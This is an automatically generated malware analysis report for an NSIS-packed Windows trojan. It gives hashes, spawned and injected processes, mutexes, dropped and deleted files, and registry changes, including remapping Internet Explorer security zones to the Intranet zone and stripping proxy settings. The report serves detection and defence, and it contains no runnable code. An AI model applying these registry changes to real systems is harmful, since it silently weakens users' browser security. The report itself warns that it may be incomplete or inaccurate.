Trojan.NSIS.StartPage_f43a604241
Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: f43a604241f2bb41d3ee1064890c23e1
SHA1: 056ba21a40e6beade3dc58fcd235e8a586f3adf6
SHA256: 544feaa02ef78f2468cea21c55a2573ca37249aad27b2fcc612fbd13b886491c
SSDeep: 3072:jQIURTXJeMMeGha2ppB6K58lAR0HhOv8W0Fb83:js9MtR8uyQv0B83
Size: 103077 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsh1D.tmp:260
nsh1D.tmp:1264
Bind.exe:776
amisid.exe:828
ppt.exe:1788
%original file name%.exe:1332
nsr1A.tmp:2012
nst16.tmp:264
nsw7.tmp:1224
nsn24.tmp:1984
setup3.exe:408
nsoB.tmp:284
setup3.tmp:1040
The Trojan injects its code into the following process(es):
avg18.exe:1888
adv_128.exe:1276
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex
File activity
The process nsh1D.tmp:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (909 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (0 bytes)
The process nsh1D.tmp:1264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (544 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (0 bytes)
The process avg18.exe:1888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188757 bytes)
The process %original file name%.exe:1332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pptxd[1].exe (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (10646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\wpesEcv[1].exe (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process nsr1A.tmp:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1D.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe (8472 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (0 bytes)
The process nst16.tmp:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\avg18.exe (40388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe (152993 bytes)
The process nsw7.tmp:1224 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp (0 bytes)
The process nsn24.tmp:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\setup3.exe (2420 bytes)
The process setup3.exe:408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (7386 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (0 bytes)
The process nsoB.tmp:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (3638 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (0 bytes)
The process setup3.tmp:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\baidu\is-GBLUE.tmp (36 bytes)
%Program Files%\baidu\unins000.dat (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\is-KO5N5.tmp (34453 bytes)
%Program Files%\baidu\is-I042G.tmp (601 bytes)
%Program Files%\baidu\baidu.ini (65 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup (0 bytes)
Registry activity
The process nsh1D.tmp:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst22.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 19 20 A1 CD 54 BE 8E 33 25 ED 48 50 3D 3B 0C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsh1D.tmp:1264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 94 B2 1A EC 32 4B A1 02 33 A6 26 45 DB D1 E1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process Bind.exe:776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D E0 96 39 2D 9D A7 C0 08 F8 D5 27 20 2D F5 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process avg18.exe:1888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 A6 4A 1B FE 57 6D F7 DC D9 34 83 07 D6 1B 13"
The process amisid.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "C8318CA6891F5119A9FD96EC19E98D71"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 DE D2 21 3A 2B 57 7B 10 08 5A 27 F1 22 3C 52"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process ppt.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 14 A3 8B BD 41 65 E5 B7 17 46 17 D1 E3 F6 4E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
